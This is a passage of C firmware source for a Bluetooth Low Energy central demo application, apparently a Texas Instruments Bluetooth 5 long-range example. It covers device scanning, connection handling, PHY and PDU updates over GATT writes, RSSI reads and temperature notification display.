typedefed to scanResultDeviceRecord_t\ntypedef struct\n{\n uint8 addrType; //!< Address Type: @ref GAP_Addr_Types\n uint8 addr[B_ADDR_LEN]; //!< Device's Address\n} scanResultDeviceRecord_t;\n\ntypedef struct\n{\n uint16_t charHdl; //!< Characteristic Handle\n uint8 addr[ATT_UUID_SIZE]; //!< UUID of characteristic\n} CharProfileHdl_t;\n\n/*********************************************************************\n * GLOBAL VARIABLES\n */\n\n// Display Interface\nDisplay_Handle dispHandle = NULL;\n\n/*********************************************************************\n * EXTERNAL VARIABLES\n */\n\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\n// Entity ID globally used to check for source and/or destination of messages\nstatic ICall_EntityID selfEntity;\n\n// Event globally used to post local events and pend on system and\n// local events.\nstatic ICall_SyncHandle syncEvent;\n\n// Clock object used to signal timeout\nstatic Clock_Struct startDiscClock;\nstatic Clock_Struct periodicLED;\nstatic Clock_Struct startPHYClock;\n\n// Queue object used for app messages\nstatic Queue_Struct appMsg;\nstatic Queue_Handle appMsgQueue;\n\n// Task configuration\nTask_Struct sbcTask;\nChar sbcTaskStack[SBC_TASK_STACK_SIZE];\n\n// GAP GATT Attributes\nstatic const uint8_t attDeviceName[GAP_DEVICE_NAME_LEN] = \"BLE5 Central\";\n\n// Number of scan results and scan result index\nstatic uint8_t scanRes = 0;\nstatic int8_t scanIdx = -1;\n\n// Scan result list\nstatic scanResultDeviceRecord_t devList[DEFAULT_MAX_SCAN_RES];\n\n// Connection handle of current connection\nstatic uint16_t connHandle = GAP_CONNHANDLE_INIT;\n\n// Application state\nstatic uint8_t state = BLE_STATE_IDLE;\n\n// Discovery state\nstatic uint8_t discState = BLE_DISC_STATE_IDLE;\n\n// Discovered service start and end handle\nstatic uint16_t svcStartHdl = 0;\nstatic uint16_t svcEndHdl = 0;\n\n// Maximum PDU size (default = 27 octets)\nstatic uint16 maxPduSize;\n\n// Array of RSSI read structures\nstatic readRssi_t readRssi[MAX_NUM_BLE_CONNS];\n\n//// Received byte counters + circular buffer for Throughput Data\n//static volatile uint32_t bytesRecvd = 0;\n//#define CB_SIZE 10\n//static uint32_t bytesRecvd_cb[CB_SIZE];\n//static int bytesRecvd_cb_index = 0;\n//static bool cbBufferFilled = false;\n\n// Strings for PHY\nstatic uint8_t* phyName[] = {\n \"1 Mbps\", \"2 Mbps\",\n \"Coded:S2\", \"Coded:S8\",\n \"Coded\"\n};\n\n// PHY Index\nstatic uint8_t phyIndex = 0;\nstatic bool phyConfirm = true;\n\n// Pointer to requested PHY index\nstatic uint8_t* phyClock_phyIndex= 0;\n\n// PHY Options\nstatic uint16_t phyOptions = HCI_PHY_OPT_NONE;\n\nstatic CharProfileHdl_t* throughputHandles = NULL;\nstatic CharProfileHdl_t* temperatureHandles = NULL;\n\n// PIN config\n\n// Global pin resources\nPIN_State pin;\nPIN_Handle appPins;\nstatic PIN_Config pinTable[] =\n{\n Board_RLED | PIN_GPIO_OUTPUT_EN | PIN_GPIO_LOW | PIN_PUSHPULL | PIN_DRVSTR_MAX, /* LED initially off */\n Board_GLED | PIN_GPIO_OUTPUT_EN | PIN_GPIO_LOW | PIN_PUSHPULL | PIN_DRVSTR_MAX, /* LED initially off */\n\n PIN_TERMINATE\n};\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\nstatic void SimpleBLECentral_init(void);\nstatic void SimpleBLECentral_taskFxn(UArg a0, UArg a1);\n\nstatic void SimpleBLECentral_processGATTMsg(gattMsgEvent_t *pMsg);\nstatic void SimpleBLECentral_handleKeys(uint8_t shift, uint8_t keys);\nstatic void SimpleBLECentral_processStackMsg(ICall_Hdr *pMsg);\nstatic void SimpleBLECentral_processAppMsg(sbcEvt_t *pMsg);\nstatic void SimpleBLECentral_processRoleEvent(gapCentralRoleEvent_t *pEvent);\nstatic void SimpleBLECentral_processGATTDiscEvent(gattMsgEvent_t *pMsg);\nstatic void SimpleBLECentral_startDiscovery(void);\nstatic bool SimpleBLECentral_findSvcUuid(uint16_t uuid, uint8_t *pData, uint8_t dataLen);\nstatic void SimpleBLECentral_addDeviceInfo(uint8_t *pAddr, uint8_t addrType, uint8_t dataType, uint8_t dataLen, uint8_t* data);\nstatic void SimpleBLECentral_performLEDTask(void);\nstatic void SimpleBLECentral_clockHandler(UArg arg);\n\nstatic void SimpleBLECentral_processCmdCompleteEvt(hciEvt_CmdComplete_t *pMsg);\nstatic bStatus_t SimpleBLECentral_StartRssi(uint16_t connHandle, uint16_t period);\nstatic bStatus_t SimpleBLECentral_CancelRssi(uint16_t connHandle);\nstatic readRssi_t *SimpleBLECentral_RssiAlloc(uint16_t connHandle);\nstatic readRssi_t *SimpleBLECentral_RssiFind(uint16_t connHandle);\nstatic void SimpleBLECentral_RssiFree(uint16_t connHandle);\n\nstatic uint8_t SimpleBLECentral_eventCB(gapCentralRoleEvent_t *pEvent);\n\nvoid SimpleBLECentral_speedHandler(UArg a0);\nvoid SimpleBLECentral_PHYHandler(UArg a0);\nvoid SimpleBLECentral_startDiscHandler(UArg a0);\nvoid SimpleBLECentral_keyChangeHandler(uint8 keys);\nvoid SimpleBLECentral_readRssiHandler(UArg a0);\n\nstatic uint8_t SimpleBLECentral_enqueueMsg(uint8_t event, uint8_t status,\n void *pData);\n\nstatic void SBC_ClearDeviceList();\nstatic void SBC_NextDevice();\nstatic void SBC_ConnectToDevice();\n\n/*********************************************************************\n * EXTERN FUNCTIONS\n */\nextern void AssertHandler(uint8 assertCause, uint8 assertSubcause);\n\n/*********************************************************************\n * PROFILE CALLBACKS\n */\n\n// GAP Role Callbacks\nstatic gapCentralRoleCB_t SimpleBLECentral_roleCB =\n{\n SimpleBLECentral_eventCB // Event callback\n};\n\n/*********************************************************************\n * PUBLIC FUNCTIONS\n */\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_createTask\n *\n * @brief Task creation function for the Simple BLE Peripheral.\n *\n * @param none\n *\n * @return none\n */\nvoid SimpleBLECentral_createTask(void)\n{\n Task_Params taskParams;\n\n // Configure task\n Task_Params_init(&taskParams);\n taskParams.stack = sbcTaskStack;\n taskParams.stackSize = SBC_TASK_STACK_SIZE;\n taskParams.priority = SBC_TASK_PRIORITY;\n\n Task_construct(&sbcTask, SimpleBLECentral_taskFxn, &taskParams, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_Init\n *\n * @brief Initialization function for the Simple BLE Central App Task.\n * This is called during initialization and should contain\n * any application specific initialization (ie. hardware\n * initialization/setup, table initialization, power up\n * notification).\n *\n * @param none\n *\n * @return none\n */\nstatic void SimpleBLECentral_init(void)\n{\n uint8_t i;\n\n // ******************************************************************\n // N0 STACK API CALLS CAN OCCUR BEFORE THIS CALL TO ICall_registerApp\n // ******************************************************************\n // Register the current thread as an ICall dispatcher application\n // so that the application can send and receive messages.\n ICall_registerApp(&selfEntity, &syncEvent);\n\n appPins = PIN_open(&pin, pinTable);\n PIN_setOutputValue(appPins, Board_RLED, Board_LED_ON);\n\n // Create an RTOS queue for message from profile to be sent to app.\n appMsgQueue = Util_constructQueue(&appMsg);\n\n // Setup discovery delay as a one-shot timer\n Util_constructClock(&startDiscClock, SimpleBLECentral_startDiscHandler,\n DEFAULT_SVC_DISCOVERY_DELAY, 0, false, NULL);\n\n // Setup throughput clock to run every second\n // Create one-shot clocks for internal periodic events.\n Util_constructClock(&periodicLED, SimpleBLECentral_clockHandler,\n SBC_PERIODIC_LED_PERIOD, 0, false, SBC_PERIODIC_LED_EVT);\n\n // Set up a PHY Clock for transitions between Coded PHYs\n Util_constructClock(&startPHYClock, SimpleBLECentral_PHYHandler,\n 0, 0, false, 0);\n\n Board_initKeys(SimpleBLECentral_keyChangeHandler);\n\n // Open Display.\n dispHandle = Display_open(SBC_DISPLAY_TYPE, NULL);\n\n // Initialize internal data\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n readRssi[i].connHandle = GAP_CONNHANDLE_ALL;\n readRssi[i].pClock = NULL;\n }\n\n // Setup Central Profile\n {\n uint8_t scanRes = DEFAULT_MAX_SCAN_RES;\n\n GAPCentralRole_SetParameter(GAPCENTRALROLE_MAX_SCAN_RES, sizeof(uint8_t),\n &scanRes);\n }\n\n // Setup GAP\n GAP_SetParamValue(TGAP_GEN_DISC_SCAN, DEFAULT_SCAN_DURATION);\n GAP_SetParamValue(TGAP_LIM_DISC_SCAN, DEFAULT_SCAN_DURATION);\n GGS_SetParameter(GGS_DEVICE_NAME_ATT, GAP_DEVICE_NAME_LEN,\n (void *)attDeviceName);\n\n // Initialize GATT Client\n VOID GATT_InitClient();\n\n // Register to receive incoming ATT Indications/Notifications\n GATT_RegisterForInd(selfEntity);\n\n // Initialize GATT attributes\n GGS_AddService(GATT_ALL_SERVICES); // GAP\n GATTServApp_AddService(GATT_ALL_SERVICES); // GATT attributes\n\n // Start the Device\n VOID GAPCentralRole_StartDevice(&SimpleBLECentral_roleCB);\n\n // Register with GAP for HCI/Host messages (for RSSI)\n GAP_RegisterForMsgs(selfEntity);\n\n // Register for GATT local events and ATT Responses pending for transmission\n GATT_RegisterForMsgs(selfEntity);\n\n /*\n * TBM stuff\n */\n\n // Set the title of the main menu\n TBM_SET_TITLE(&sbcMenuMain, \"Texas Instruments Bluetooth 5 Long Range Demo\");\n\n // Initialize Two-Button Menu module\n tbm_setItemStatus(&sbcMenuMain, TBM_ITEM_0, TBM_ITEM_1 | TBM_ITEM_2 );\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_0 | TBM_ITEM_1);\n\n tbm_initTwoBtnMenu(dispHandle, &sbcMenuMain, 2, NULL);\n\n // Get Current Data Length\n HCI_LE_ReadMaxDataLenCmd();\n\n // By Default Allow Central to support any and all PHYs\n HCI_LE_SetDefaultPhyCmd(LL_PHY_USE_ANY_PHY,\n LL_PHY_1_MBPS | LL_PHY_2_MBPS | HCI_PHY_CODED,\n LL_PHY_1_MBPS | LL_PHY_2_MBPS | HCI_PHY_CODED);\n\n HCI_EXT_SetTxPowerCmd(HCI_EXT_TX_POWER_5_DBM);\n HCI_EXT_SetRxGainCmd(HCI_EXT_RX_GAIN_HIGH);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_taskFxn\n *\n * @brief Application task entry point for the Simple BLE Central.\n *\n * @param none\n *\n * @return events not processed\n */\nstatic void SimpleBLECentral_taskFxn(UArg a0, UArg a1)\n{\n // Initialize application\n SimpleBLECentral_init();\n\n // Application main loop\n for (;;)\n {\n uint32_t events;\n\n events = Event_pend(syncEvent, Event_Id_NONE, SBC_ALL_EVENTS,\n ICALL_TIMEOUT_FOREVER);\n\n if (events)\n {\n ICall_EntityID dest;\n ICall_ServiceEnum src;\n ICall_HciExtEvt *pMsg = NULL;\n\n if (ICall_fetchServiceMsg(&src, &dest,\n (void **)&pMsg) == ICALL_ERRNO_SUCCESS)\n {\n if ((src == ICALL_SERVICE_CLASS_BLE) && (dest == selfEntity))\n {\n // Process inter-task message\n SimpleBLECentral_processStackMsg((ICall_Hdr *)pMsg);\n }\n\n if (pMsg)\n {\n ICall_freeMsg(pMsg);\n }\n }\n\n // If RTOS queue is not empty, process app message\n if (events & SBC_QUEUE_EVT)\n {\n while (!Queue_empty(appMsgQueue))\n {\n sbcEvt_t *pMsg = (sbcEvt_t *)Util_dequeueMsg(appMsgQueue);\n if (pMsg)\n {\n // Process message\n SimpleBLECentral_processAppMsg(pMsg);\n\n // Free the space from the message\n ICall_free(pMsg);\n }\n }\n }\n\n // Instantanous Speed Event\n if (events & SBC_START_DISCOVERY_EVT)\n {\n SimpleBLECentral_startDiscovery();\n }\n\n if (events & SBC_PERIODIC_LED_EVT)\n {\n Util_startClock(&periodicLED);\n\n // Perform periodic application task\n SimpleBLECentral_performLEDTask();\n }\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processStackMsg\n *\n * @brief Process an incoming task message.\n *\n * @param pMsg - message to process\n *\n * @return none\n */\nstatic void SimpleBLECentral_processStackMsg(ICall_Hdr *pMsg)\n{\n switch (pMsg->event)\n {\n case GAP_MSG_EVENT:\n SimpleBLECentral_processRoleEvent((gapCentralRoleEvent_t *)pMsg);\n break;\n\n case GATT_MSG_EVENT:\n SimpleBLECentral_processGATTMsg((gattMsgEvent_t *)pMsg);\n break;\n\n case HCI_GAP_EVENT_EVENT:\n {\n // Process HCI message\n switch(pMsg->status)\n {\n case HCI_COMMAND_COMPLETE_EVENT_CODE:\n SimpleBLECentral_processCmdCompleteEvt((hciEvt_CmdComplete_t *)pMsg);\n break;\n\n case HCI_BLE_HARDWARE_ERROR_EVENT_CODE:\n AssertHandler(HAL_ASSERT_CAUSE_HARDWARE_ERROR,0);\n break;\n\n case HCI_LE_EVENT_CODE:\n {\n hciEvt_BLEPhyUpdateComplete_t *pPUC\n = (hciEvt_BLEPhyUpdateComplete_t*) pMsg;\n\n if (pPUC->BLEEventCode == HCI_BLE_PHY_UPDATE_COMPLETE_EVENT)\n {\n if (pPUC->status != SUCCESS)\n {\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"PHY Change failure\");\n }\n else\n {\n // Inform User that the PHY was Updated, and which PHY is\n // the PHY being used for the connection\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"PHY Update Complete\");\n\n // Figure out which PHY is being used\n uint8_t temp = 0;\n switch(pPUC->txPhy)\n {\n case HCI_PHY_1_MBPS:\n temp = 0;\n break;\n\n case HCI_PHY_2_MBPS:\n temp = 1;\n break;\n\n case HCI_PHY_CODED:\n temp = 4;\n break;\n }\n\n // If PhyConfirm is false, that means we initated the change\n // if that is the case, then we can use detailed information\n // for coded PHY - use phyIndex instead\n if( phyConfirm == false)\n {\n // This means that the phyIndex was assigned by us.\n // Confirm the value\n\n // Critial Section so our Timer's SWI can't read the value while\n // we're writing to it.\n UInt key = Hwi_disable();\n {\n // Confirm the change to the phyIndex\n phyConfirm = true;\n }\n Hwi_restore(key);\n }\n else\n {\n // the peer device requested the change to PHY\n // update phyIndex accordingly and display the value\n phyIndex = temp;\n }\n\n // Tell the use which PHY we're now using\n Display_print1(dispHandle, SBC_ROW_PHY, 0, \"Current PHY: %s\", phyName[phyIndex]);\n\n Util_startClock(&periodicLED);\n }\n }\n }\n break;\n\n default:\n break;\n }\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processAppMsg\n *\n * @brief Central application event processing function.\n *\n * @param pMsg - pointer to event structure\n *\n * @return none\n */\nstatic void SimpleBLECentral_processAppMsg(sbcEvt_t *pMsg)\n{\n\n attWriteReq_t writeReq = {0};\n\n switch (pMsg->hdr.event)\n {\n case SBC_STATE_CHANGE_EVT:\n SimpleBLECentral_processStackMsg((ICall_Hdr *)pMsg->pData);\n\n // Free the stack message\n ICall_freeMsg(pMsg->pData);\n break;\n\n case SBC_KEY_CHANGE_EVT:\n SimpleBLECentral_handleKeys(0, pMsg->hdr.state);\n break;\n\n case SBC_RSSI_READ_EVT:\n {\n readRssi_t *pRssi = (readRssi_t *)pMsg->pData;\n\n // If link is up and RSSI reads active\n if (pRssi->connHandle != GAP_CONNHANDLE_ALL &&\n linkDB_Up(pRssi->connHandle))\n {\n // Restart timer\n Util_restartClock(pRssi->pClock, pRssi->period);\n\n // Read RSSI\n VOID HCI_ReadRssiCmd(pRssi->connHandle);\n }\n }\n break;\n\n case SBC_ENABLE_TEMPERATURE_NOTI_EVT:\n {\n uint8_t data[2] = {0x01, 0x00};\n\n // Populate the Request Structure\n writeReq.cmd = 0;\n writeReq.handle = temperatureHandles[TEMPERATURE_SERVICE_DATA].charHdl + 1;\n writeReq.len = 2;\n writeReq.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, 2, NULL);\n memcpy(writeReq.pValue, data, 2);\n writeReq.sig = 0;\n\n // Perform a GATT Write + Check Status\n uint8_t status;\n\n status = GATT_WriteCharValue(connHandle, &writeReq, selfEntity);\n\n if( status != SUCCESS ) {\n // Inform user that a Request was sent to update peer's PDU Size\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Can't enable Notifications\");\n\n GATT_bm_free((gattMsg_t *)writeReq.pValue, ATT_WRITE_REQ);\n }\n else {\n SimpleBLECentral_doSetPhy(3);\n }\n }\n break;\n\n case SBC_PDU_UPDATE_EVT:\n {\n // When Changing PDU Size, throughput is momentaryly stopped on the peripehral\n // side for the application to process the change.\n // During this time the throughput not reflect the correct value\n\n // Attempt to send PDU update via GATT Write\n // Variables Needed for GATT Write\n uint8_t pduSize = (uint8_t) *(pMsg->pData); // Cast down to uint8_t\n\n // Populate the Request Structure\n writeReq.cmd = 0;\n writeReq.handle = throughputHandles[THROUGHPUT_SERVICE_UPDATE_PDU].charHdl;\n writeReq.len = THROUGHPUT_SERVICE_UPDATE_PHY_LEN;\n writeReq.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, THROUGHPUT_SERVICE_UPDATE_PHY_LEN, NULL);\n memcpy(writeReq.pValue, &pduSize, THROUGHPUT_SERVICE_UPDATE_PHY_LEN);\n writeReq.sig = 0;\n\n // Perform a GATT Write + Check Status\n uint8_t status;\n\n status = GATT_WriteCharValue(connHandle, &writeReq, selfEntity);\n\n if( status != SUCCESS )\n {\n // We didn't successfully send this command to the stack!\n // Let's attempt to retransmit again and free the pValue pointer\n\n GATT_bm_free((gattMsg_t *)writeReq.pValue, ATT_WRITE_REQ);\n\n // Requeue the Message - don't free the memory for PDU size yet\n SimpleBLECentral_enqueueMsg(SBC_PDU_UPDATE_EVT, SUCCESS, pMsg->pData);\n }\n else\n {\n // Transmitting to the stack was successful\n // The peripheral should being doing throughput soon\n\n // Inform user that a Request was sent to update peer's PDU Size\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Requested Peer Change TX PDU Size to %dB\", pduSize);\n\n // Free the Allocated Memory\n if(pMsg->pData)\n {\n ICall_free(pMsg->pData);\n }\n }\n break;\n }\n\n case SBC_PHY_UPDATE_EVT:\n {\n // When Changing PHY, throughput is stopped on the peripehral\n // side for the application to process the change.\n // During this time the throughput not reflect the correct value\n\n // Critial Section so our Timer's SWI can't read the value while\n // we're writing to it.\n UInt key = Hwi_disable();\n {\n // Assign the PHY index - so we can keep track of PHY,\n // more importantly, coded phy and which symbol rate is being used\n phyIndex = (uint8_t) *(pMsg->pData);\n // reset confirm, indicating that it's the PHY being used in the\n // connection yet.\n phyConfirm = false;\n }\n Hwi_restore(key);\n\n // Populate the Request Structure\n writeReq.cmd = 0;\n writeReq.handle = throughputHandles[THROUGHPUT_SERVICE_UPDATE_PHY].charHdl;\n writeReq.len = THROUGHPUT_SERVICE_UPDATE_PHY_LEN;\n writeReq.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, THROUGHPUT_SERVICE_UPDATE_PHY_LEN, NULL);\n memcpy(writeReq.pValue, &phyIndex, THROUGHPUT_SERVICE_UPDATE_PHY_LEN);\n writeReq.sig = 0;\n\n // Perform a GATT Write + Check Status\n uint8_t status;\n\n status = GATT_WriteCharValue(connHandle, &writeReq, selfEntity);\n\n if( status != SUCCESS )\n {\n // We didn't successfully send this command to the stack!\n // Let's attempt to retransmit again and free the pValue pointer\n\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"GATT_WriteCharValue status: %d\", status);\n\n GATT_bm_free((gattMsg_t *)writeReq.pValue, ATT_WRITE_REQ);\n\n // Requeue the Message - don't free the memory for PHY change yet\n SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, pMsg->pData);\n }\n else\n {\n // Transmitting to the stack was successful\n // The peripheral should being doing throughput soon\n\n // Inform user that a Request was sent to update peer's PHY Size\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Requested Peer Change PHY to %s\", phyName[phyIndex]);\n\n // Note if we're already using coded PHY, switching between S2 and S8\n // won't produce a PHY change event.\n\n // Free the Allocated Memory\n if(pMsg->pData)\n {\n ICall_free(pMsg->pData);\n }\n }\n break;\n }\n\n default:\n // Do nothing.\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processRoleEvent\n *\n * @brief Central role event processing function.\n *\n * @param pEvent - pointer to event structure\n *\n * @return none\n */\nstatic void SimpleBLECentral_processRoleEvent(gapCentralRoleEvent_t *pEvent)\n{\n switch (pEvent->gap.opcode)\n {\n case GAP_DEVICE_INIT_DONE_EVENT:\n {\n maxPduSize = pEvent->initDone.dataPktLen;\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"This Device's BDADDR : %s\", Util_convertBdAddr2Str(pEvent->initDone.devAddr));\n }\n break;\n\n case GAP_DEVICE_INFO_EVENT:\n {\n /*\n * Device Filtering can be done here for UUID or advertisement\n * Data if desired.\n *\n * We populate the devList with both the scan response data and\n * advertisement data of each device discovered\n */\n SimpleBLECentral_addDeviceInfo(pEvent->deviceInfo.addr,\n pEvent->deviceInfo.addrType,\n pEvent->deviceInfo.eventType,\n pEvent->deviceInfo.dataLen,\n pEvent->deviceInfo.pEvtData);\n }\n break;\n\n case GAP_DEVICE_DISCOVERY_EVENT:\n {\n // Initialize scan index.\n scanIdx = -1;\n\n /*\n * Note that pEvent->discCmpl contains a list of device records (NOT scan response data)\n * Scan Response Data is contained in the GAP_DEVICE_INFO_EVENT during Scanning\n * We're verifying that we got the right number of device info responses\n * If you don't care about device response data, you could just use\n * the data from the GAP_DEVICE_DISCOVERY_EVENT as your scan results list\n * as shown in the commented code below\n *\n * If we're not filtering on UUID then we should have gotten ALL of the\n * possible devices scanned in our device list.\n */\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"%d Devices Found\", scanRes);\n\n if (scanRes > 0)\n {\n // Re enable all Menu Functions\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_NONE);\n\n // Display the first scan Result\n SBC_NextDevice();\n }\n else\n {\n // No Results, reenable scanning only\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_0 | TBM_ITEM_1);\n }\n }\n break;\n\n case GAP_LINK_ESTABLISHED_EVENT:\n {\n if (pEvent->gap.hdr.status == SUCCESS)\n {\n state = BLE_STATE_CONNECTED;\n connHandle = pEvent->linkCmpl.connectionHandle;\n\n //Util_startClock(&periodicLED);\n\n // Go to Main Menu\n tbm_goTo(&sbcMenuMain);\n\n // Disable Scan Connect Menu, enable everything else\n tbm_setItemStatus(&sbcMenuMain, TBM_ITEM_ALL, TBM_ITEM_0);\n\n // Forget about the Scan Results\n SBC_ClearDeviceList();\n\n // If service discovery not performed initiate service discovery\n Util_startClock(&startDiscClock);\n\n // Update Display\n Display_print1(dispHandle, SBC_ROW_PEER_DEVICE, 0, \"Peer Device : %s\", Util_convertBdAddr2Str(pEvent->linkCmpl.devAddr));\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Connected, Exchanging MTU\");\n Display_print0(dispHandle, SBC_ROW_PHY, 0, \"PHY: 1 Mbps\");\n\n // Start RSSI collection\n SimpleBLECentral_StartRssi(connHandle, DEFAULT_RSSI_PERIOD);\n }\n else\n {\n state = BLE_STATE_IDLE;\n connHandle = GAP_CONNHANDLE_INIT;\n discState = BLE_DISC_STATE_IDLE;\n\n // TODO: Remember scan Results and re enable menu\n\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Reason: %d\", pEvent->gap.hdr.status);\n }\n }\n break;\n\n case GAP_LINK_TERMINATED_EVENT:\n {\n state = BLE_STATE_IDLE;\n connHandle = GAP_CONNHANDLE_INIT;\n discState = BLE_DISC_STATE_IDLE;\n scanIdx = -1;\n\n // Throughput as well, if enabled\n Util_stopClock(&periodicLED);\n SimpleBLECentral_performLEDTask();\n\n // Cancel RSSI reads\n SimpleBLECentral_CancelRssi(pEvent->linkTerminate.connectionHandle);\n\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Reason: %d\", pEvent->linkTerminate.reason);\n Display_clearLine(dispHandle, SBC_ROW_PEER_DEVICE);\n Display_clearLine(dispHandle, SBC_ROW_PHY);\n Display_clearLine(dispHandle, SBC_ROW_RSSI);\n Display_clearLine(dispHandle, SBC_ROW_TEMP);\n\n // Go to Main Menu\n tbm_goTo(&sbcMenuMain);\n\n // Enable Scan Connect Menu, Disable everything else\n tbm_setItemStatus(&sbcMenuMain, TBM_ITEM_0, TBM_ITEM_1 | TBM_ITEM_2 | TBM_ITEM_3 | TBM_ITEM_4);\n\n // No Results, reenable scanning only\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_0 | TBM_ITEM_1);\n }\n break;\n\n case GAP_LINK_PARAM_UPDATE_EVENT:\n {\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Param Update: %d\", pEvent->linkUpdate.status);\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_handleKeys\n *\n * @brief Handles all key events for this device.\n *\n * @param shift - true if in shift/alt.\n * @param keys - bit field for key events. Valid entries:\n * HAL_KEY_SW_2\n * HAL_KEY_SW_1\n *\n * @return none\n */\nstatic void SimpleBLECentral_handleKeys(uint8_t shift, uint8_t keys)\n{\n if (keys & KEY_LEFT)\n {\n // Check if the key is still pressed. WA for possible bouncing.\n if (PIN_getInputValue(Board_PIN_BUTTON0) == 0)\n {\n tbm_buttonLeft();\n }\n }\n\n if (keys & KEY_RIGHT)\n {\n // Check if the key is still pressed. WA for possible bouncing.\n if (PIN_getInputValue(Board_PIN_BUTTON1) == 0)\n {\n tbm_buttonRight();\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processGATTMsg\n *\n * @brief Process GATT messages and events.\n *\n * @return none\n */\nstatic void SimpleBLECentral_processGATTMsg(gattMsgEvent_t *pMsg)\n{\n if (state == BLE_STATE_CONNECTED)\n {\n // See if GATT server was unable to transmit an ATT response\n if (pMsg->hdr.status == blePending)\n {\n // No HCI buffer was available. App can try to retransmit the response\n // on the next connection event. Drop it for now.\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"ATT Rsp dropped %d\", pMsg->method);\n }\n else if ((pMsg->method == ATT_READ_RSP) ||\n ((pMsg->method == ATT_ERROR_RSP) &&\n (pMsg->msg.errorRsp.reqOpcode == ATT_READ_REQ)))\n {\n if (pMsg->method == ATT_ERROR_RSP)\n {\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"Read Error %d\", pMsg->msg.errorRsp.errCode);\n }\n else\n {\n // After a successful read, display the read value\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"Read rsp: %d\", pMsg->msg.readRsp.pValue[0]);\n }\n }\n else if ((pMsg->method == ATT_WRITE_RSP) ||\n ((pMsg->method == ATT_ERROR_RSP) &&\n (pMsg->msg.errorRsp.reqOpcode == ATT_WRITE_REQ)))\n {\n if (pMsg->method == ATT_ERROR_RSP)\n {\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"GATT Write Error %d\", pMsg->msg.errorRsp.errCode);\n }\n else\n {\n // After a successful write, display the value that was written and\n // increment value\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"GATT Write Sent to Peer\");\n }\n }\n else if (pMsg->method == ATT_FLOW_CTRL_VIOLATED_EVENT)\n {\n // ATT request-response or indication-confirmation flow control is\n // violated. All subsequent ATT requests or indications will be dropped.\n // The app is informed in case it wants to drop the connection.\n\n // Display the opcode of the message that caused the violation.\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"FC Violated: %d\", pMsg->msg.flowCtrlEvt.opcode);\n }\n else if (pMsg->method == ATT_HANDLE_VALUE_NOTI)\n {\n // Critial Section so our Timer's SWI can't read the value while\n // we're writing to it.\n// UInt key = Hwi_disable();\n// {\n// bytesRecvd += pMsg->msg.handleValueNoti.len;\n// }\n// Hwi_restore(key);\n Temperature_Service_Data *data = (Temperature_Service_Data *)pMsg->msg.handleValueNoti.pValue;\n\n Display_print1(dispHandle, SBC_ROW_TEMP, 0, \"Object Temperature: %02d (C)\",\n BUILD_UINT16(data->objectLowByte, data->objectHighByte));\n }\n else if (pMsg->method == ATT_MTU_UPDATED_EVENT)\n {\n // MTU size updated\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"MTU Exchanged\");\n }\n else if (discState != BLE_DISC_STATE_IDLE)\n {\n SimpleBLECentral_processGATTDiscEvent(pMsg);\n }\n } // else - in case a GATT message came after a connection has dropped, ignore it.\n\n // Needed only for ATT Protocol messages\n GATT_bm_free(&pMsg->msg, pMsg->method);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processCmdCompleteEvt\n *\n * @brief Process an incoming OSAL HCI Command Complete Event.\n *\n * @param pMsg - message to process\n *\n * @return none\n */\nstatic void SimpleBLECentral_processCmdCompleteEvt(hciEvt_CmdComplete_t *pMsg)\n{\n switch (pMsg->cmdOpcode)\n {\n case HCI_READ_RSSI:\n {\n int8 rssi = (int8)pMsg->pReturnParam[3];\n\n Display_print1(dispHandle, SBC_ROW_RSSI, 0, \"RSSI -dBm: %d\", (uint32_t)(-rssi));\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_StartRssi\n *\n * @brief Start periodic RSSI reads on a link.\n *\n * @param connHandle - connection handle of link\n * @param period - RSSI read period in ms\n *\n * @return SUCCESS: Terminate started\n * bleIncorrectMode: No link\n * bleNoResources: No resources\n */\nstatic bStatus_t SimpleBLECentral_StartRssi(uint16_t connHandle, uint16_t period)\n{\n readRssi_t *pRssi;\n\n // Verify link is up\n if (!linkDB_Up(connHandle))\n {\n return bleIncorrectMode;\n }\n\n // If already allocated\n if ((pRssi = SimpleBLECentral_RssiFind(connHandle)) != NULL)\n 